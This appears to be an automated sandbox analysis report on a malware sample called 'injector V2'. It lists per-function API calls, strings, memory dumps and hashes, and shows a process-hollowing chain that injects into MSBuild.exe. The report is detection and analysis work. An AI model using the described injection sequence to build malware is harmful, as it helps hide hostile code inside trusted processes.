WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 00B5D3FB
WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00B5D446
WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00B5D484
Wow64SetThreadContext.KERNEL32(000000F8,00A40000), ref: 00B5D4C0
ResumeThread.KERNELBASE(000000F8), ref: 00B5D4CF

Strings

VirtualAlloc, xrefs: 00B5D252
ress, xrefs: 00B5D215
Load, xrefs: 00B5D1C9
GetP, xrefs: 00B5D20D
WriteProcessMemory, xrefs: 00B5D29E
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00B5D322
VirtualAllocEx, xrefs: 00B5D28B
SetThreadContext, xrefs: 00B5D2B1
ReadProcessMemory, xrefs: 00B5D278
ResumeThread, xrefs: 00B5D2C7
TerminateProcess, xrefs: 00B5D3B2
CreateProcessW, xrefs: 00B5D23F
aryA, xrefs: 00B5D1D1
GetThreadContext, xrefs: 00B5D265

Memory Dump Source

Source File: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: e150c4a12f20bb977068c66e3957c89d6fc74e7534b9f4564b61261a02f19c73
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: AFB1F67660064AAFDB60CF68CC80BDA73A5FF88714F158564EA08AB341D770FA55CB94

Function 00B2D475 Relevance: 1.5, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL
API String ID: 0-558896452
Opcode ID: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
Instruction ID: ff3b19026de63191eaf8984a4d6bfdfe40020b1f7e5154132f911ad774da07ff
Opcode Fuzzy Hash: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
Instruction Fuzzy Hash: DB61CB363112218B9E2C9A28B8E563C7BD1DF58361B3542FEF41F57AF4CA25AC4187C2

Function 00B50E88 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00B50F0D
__alloca_probe_16.LIBCMT ref: 00B50FD6
__freea.LIBCMT ref: 00B5103D

Part of subcall function 00B4EB9B: RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD

__freea.LIBCMT ref: 00B51050
__freea.LIBCMT ref: 00B5105D

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660

Function 00B4D4CA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B4D6CF: GetOEMCP.KERNEL32(00000000,?,?,788496A7,?), ref: 00B4D6FA

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D52B
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D567

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
Instruction ID: f58ce3a83534f1be53be4940bb6bf28c01797575e83e4f8f98a6c27177aa8404
Opcode Fuzzy Hash: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
Instruction Fuzzy Hash: 24513570A003459EDB21CF75C880BABBBF5EF65304F1945EED08A8B251EB749B46EB40

Function 00B4D2B2 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D2FE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D310

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
Instruction ID: c2fe17e8a1e9ebccf0b8380b5a075c61446fb4b49722ae389d363cfa1e729848
Opcode Fuzzy Hash: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
Instruction Fuzzy Hash: 1611BE715047514ACB348E3E8CD8622BAD5EB56331B380BDED0B6875F1C770DA8AF646

Function 00B2A0B0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00B2A146
ExitProcess.KERNEL32 ref: 00B2A16C

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
Instruction ID: a015e8ef9b35ebceecddd01bffcb65f3caf2a5d29ab992890bdd4d97bc4b901a
Opcode Fuzzy Hash: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
Instruction Fuzzy Hash: 8E110D35B102146BE7544A388970B6F7BEBDBCE721F1540E9E949E73C4DE314C468791

Function 00B4C7CC Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00B50F78,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00B4C800
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00B50F78,?,?,-00000008,?,00000000), ref: 00B4C81E

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
Instruction ID: 51f8adf1e4b87242fc4b9f0fe13096a84cb104d6cd0ec8de5078fb9a514c46ee
Opcode Fuzzy Hash: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
Instruction Fuzzy Hash: 6AF07A3200121ABBCF125F90DC09EEE7FA6EF487A0F094060FA1826020DB36C931BB91

Function 00B4DC4B Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00B4BC8C,00B2782F), ref: 00B4DC61
GetLastError.KERNEL32(?,?,00B4BC8C,00B2782F), ref: 00B4DC6C

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
Instruction ID: 189e6bed1e21980e7c59eb530d51daf056726a73d63c4995567e4e18d6aecb51
Opcode Fuzzy Hash: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
Instruction Fuzzy Hash: 26E04632200704ABCF122FA4FD09B997BA9EB40752F1040E0F61897161CB759A40D684

Function 00B4DA59 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,00B4D8DA,?), ref: 00B4DA8B

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
Instruction ID: 10991c991ed4056e34409d23dab0f8d1acfd3436559c108a9ae922d237ec4204
Opcode Fuzzy Hash: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
Instruction Fuzzy Hash: 185128B1908159AFDB118F28CDC4BE9BBE9EB16304F2401E9E599C7142D3359F85EB60

Function 00B2B0E4 Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B2B0FC

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
Instruction ID: 7185865113b351fa2fe8be82bdd5e34ac5f6ae5b4e13f8fe9c31b6e934f39f01
Opcode Fuzzy Hash: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
Instruction Fuzzy Hash: 7311E5316083629FCE2C9A2878A553D67D3BBE6311F3845DEE40F877A4D9628D859603

Function 00B4EB9B Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
Instruction ID: 4ae4776048349417da8c99ab35688fe90d84389156f40f1b0892cb13b7374e71
Opcode Fuzzy Hash: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
Instruction Fuzzy Hash: C3E0ED31108226AADB2127659C85F6A7AC8FB427B0F1405E0FC23934C0CF60DF00B2E2

Non-executed Functions

Function 00B36330 Relevance: 77.7, Strings: 61, Instructions: 1445COMMON

Download Yara Rule

Strings

zL%, xrefs: 00B37024
zL%, xrefs: 00B36890
zL%, xrefs: 00B36FB8
zL%, xrefs: 00B368C6
zL%, xrefs: 00B37396
V?D, xrefs: 00B371A5
V?D, xrefs: 00B373A6
{L%, xrefs: 00B36CEC
zL%, xrefs: 00B376B2
{L%, xrefs: 00B36CFA
zL%, xrefs: 00B36E9F
KJn?, xrefs: 00B3799D
zL%, xrefs: 00B365F1
zL%, xrefs: 00B375E0
zL%, xrefs: 00B37262
zL%, xrefs: 00B36AFE
zL%, xrefs: 00B37B51
V?D, xrefs: 00B3719A
KH%Y, xrefs: 00B36FED
zL%, xrefs: 00B3781E
zL%, xrefs: 00B3777C
{L%, xrefs: 00B3727D
i^', xrefs: 00B37112
h^', xrefs: 00B3703B
zL%, xrefs: 00B36B9E
zL%, xrefs: 00B36390
zL%, xrefs: 00B3795C
zL%, xrefs: 00B36F6C
zL%, xrefs: 00B3636E
zL%, xrefs: 00B36A17
zL%, xrefs: 00B37BA6
zL%, xrefs: 00B36BB3
zL%, xrefs: 00B36AE9
zL%, xrefs: 00B37809
i^', xrefs: 00B37334
zL%, xrefs: 00B373CC
zL%, xrefs: 00B37B00
V?D, xrefs: 00B37AFB
zL%, xrefs: 00B364CF
zL%, xrefs: 00B37360
zL%, xrefs: 00B36BC8
zL%, xrefs: 00B378EE
zL%, xrefs: 00B37947
zL%, xrefs: 00B368FC
KJn?, xrefs: 00B37184
LH%Y, xrefs: 00B3769D
zL%, xrefs: 00B3699E
KJn?, xrefs: 00B36D38
zL%, xrefs: 00B36638
zL%, xrefs: 00B36A02
{L%, xrefs: 00B36C0C
zL%, xrefs: 00B37153
LH%Y, xrefs: 00B372CF
LH%Y, xrefs: 00B372C1
V?D, xrefs: 00B37163
i^', xrefs: 00B37104
zL%, xrefs: 00B37A29
LH%Y, xrefs: 00B37003
KJn?, xrefs: 00B3798F
zL%, xrefs: 00B36B13
i^', xrefs: 00B37624

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: KH%Y$KJn?$KJn?$KJn?$KJn?$LH%Y$LH%Y$LH%Y$LH%Y$h^'$i^'$i^'$i^'$i^'$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%${L%${L%${L%${L%$V?D$V?D$V?D$V?D$V?D
API String ID: 0-3543999248
Opcode ID: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
Instruction ID: 8bdea4494a394f3e1a0a3e3fd6f17a2f7ca2b29a6aa1a485e4262d229aeab537
Opcode Fuzzy Hash: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
Instruction Fuzzy Hash: 83B2B17A2597006F4B38CA2895C8669B3D29FD8370B35DB86D426CF3F8DB359C468642

Function 00B39B80 Relevance: 45.8, Strings: 35, Instructions: 2072COMMON

Download Yara Rule

Strings

2h`?, xrefs: 00B3ABEE
Dt, xrefs: 00B3ACA0
zN_, xrefs: 00B3ABF3
zN_, xrefs: 00B3B69A
Hyol, xrefs: 00B3B519
Hyol, xrefs: 00B3B523
X8|, xrefs: 00B3BE6E
[u, xrefs: 00B3AC7F
W8|, xrefs: 00B3B39E
[u, xrefs: 00B39D8B
J+z7, xrefs: 00B3ADF7
Hyol, xrefs: 00B3AF2E
fM@#, xrefs: 00B3BA9F
2h`?, xrefs: 00B3BE51
Dt, xrefs: 00B3B6E0
[u, xrefs: 00B3A028
(, xrefs: 00B39CA0
sL, xrefs: 00B3B6D4
No, xrefs: 00B39F9E
fM@#, xrefs: 00B3BE26
2h`?, xrefs: 00B3B418
Dt, xrefs: 00B3A48E
sL, xrefs: 00B3BB6E
zN_, xrefs: 00B3BBEC
fM@#, xrefs: 00B3B820
(, xrefs: 00B39C70
X8|, xrefs: 00B3B845
(, xrefs: 00B3A460
J+z7, xrefs: 00B3B1A9
Yrf1, xrefs: 00B3B2C2
2h`?, xrefs: 00B3ABF8
No, xrefs: 00B3B157
Yrf1, xrefs: 00B3B9AE
Hyol, xrefs: 00B3B711
Yrf1, xrefs: 00B3A300

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: ($($($sL$sL$2h`?$2h`?$2h`?$2h`?$Dt$Dt$Dt$Hyol$Hyol$Hyol$Hyol$J+z7$J+z7$W8|$X8|$X8|$Yrf1$Yrf1$Yrf1$fM@#$fM@#$fM@#$zN_$zN_$zN_$No$No$[u$[u$[u
API String ID: 0-1459843020
Opcode ID: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
Instruction ID: ec0496337afd8055a36ec6650dbb6f14a9081dcd28c16d60811853cc85b636ee
Opcode Fuzzy Hash: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
Instruction Fuzzy Hash: E4E2C33B7097118B4A288A2CE9D466DB2D396D4325F7B86D3D9138B3F8DB748C858743

Function 00B41D30 Relevance: 32.0, Strings: 24, Instructions: 1978COMMON

Download Yara Rule

Strings

&qq!, xrefs: 00B4325B
,I"w, xrefs: 00B42E28
,I"w, xrefs: 00B43B5F
/YS, xrefs: 00B41F4C
"]j, xrefs: 00B42483
/YS, xrefs: 00B4369B
fVp, xrefs: 00B429E0
!]j, xrefs: 00B41E10
&, xrefs: 00B43981
&, xrefs: 00B432C0
/YS, xrefs: 00B43689
+I"w, xrefs: 00B420D9
&, xrefs: 00B4398C
&qq!, xrefs: 00B421A2
,I"w, xrefs: 00B43785
"]j, xrefs: 00B42967
&qq!, xrefs: 00B4374A
,I"w, xrefs: 00B43777
&qq!, xrefs: 00B4373C
&, xrefs: 00B4297F
fVp, xrefs: 00B41E00
>g[, xrefs: 00B41F10
"]j, xrefs: 00B439DE
"]j, xrefs: 00B439E8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: >g[$!]j$"]j$"]j$"]j$"]j$&qq!$&qq!$&qq!$&qq!$&$&$&$&$+I"w$,I"w$,I"w$,I"w$,I"w$fVp$fVp$/YS$/YS$/YS
API String ID: 0-635301867
Opcode ID: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
Instruction ID: 0ff9528411ddc48cbd57ec4e62b6b214c9dc22e6c9dd0d49b9e929359a4dd675
Opcode Fuzzy Hash: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
Instruction Fuzzy Hash: 30D2FB7AA056004B4A2CCA2895E163D72D3DBD877077C8BDFD4334B7E4CA719F45AA06

Function 00B3F340 Relevance: 19.6, Strings: 14, Instructions: 2099COMMON

Download Yara Rule

Strings

=am#, xrefs: 00B3F494
kX]E, xrefs: 00B3F5FB
6Haz, xrefs: 00B41156
lX]E, xrefs: 00B3FD00
lX]E, xrefs: 00B40381
6Haz, xrefs: 00B3F948
$^t0, xrefs: 00B40232
>am#, xrefs: 00B40212
>am#, xrefs: 00B3FB15
$^t0, xrefs: 00B40403
$^t0, xrefs: 00B40011
6Haz, xrefs: 00B40A0A
>am#, xrefs: 00B3F3BF
lX]E, xrefs: 00B40304

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
